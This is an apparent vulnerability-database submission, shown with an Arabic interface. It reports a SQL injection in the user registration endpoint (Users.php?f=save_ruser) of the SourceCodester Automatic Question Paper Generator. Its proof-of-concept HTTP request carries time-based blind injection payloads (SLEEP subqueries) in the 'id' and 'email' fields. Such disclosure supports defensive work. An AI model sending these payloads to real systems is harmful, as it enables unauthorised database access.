إرسال #104774: Automatic Question Paper Generator User Register SQL Injectionالمعلومات

عنوان	Automatic Question Paper Generator User Register SQL Injection
الوصف	Automatic Question Paper Generator has a SQL Injection Vulnerability in its user register function, the vulnerable URL is POST /aqpg/classes/Users.php?f=save_ruser and the multipart parameter 'id' and 'email' are both injectable. POC below: POST /aqpg/classes/Users.php?f=save_ruser HTTP/1.1 Host: x.x.x.x Content-Length: 2512 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDCKAxG7vgYRvDi6k Origin: http://x.x.x.x Referer: http://x.x.x.x/aqpg/users/register.php Accept-Language: zh-CN,zh;q=0.9 Cookie: USER_NAME_COOKIE=admin; SID_1=4f30a293; PHPSESSID=4q6s09dlvor5lvtnjsojh0pp4n Connection: close ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="id" 12 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="firstname" a1 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="middlename" b1 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="lastname" c1 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="dob" 2023-03-10 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="contact" 123123 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="email" [email protected] ' AND (SELECT 6077 FROM (SELECT(SLEEP(5)))dltn) AND 'PhRa'='PhRa ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="password" 123456 ------WebKitFormBoundaryDCKAxG7vgYRvDi6k Content-Disposition: form-data; name="img"; filename="1.PNG" Content-Type: image/png PNG ........................................................................
المصدر	⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
المستخدم	WWesleywww (UID 43117)
ارسال	23/03/2023 08:31 AM (3 سنوات منذ)
الاعتدال	23/03/2023 09:39 AM (1 hour later)
الحالة	تمت الموافقة
إدخال VulDB	223659 [SourceCodester Automatic Question Paper Generator System 1.0 Users.php?f=save_ruser id/email حقن SQL]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Want to know what is going to be exploited?

We predict KEV entries!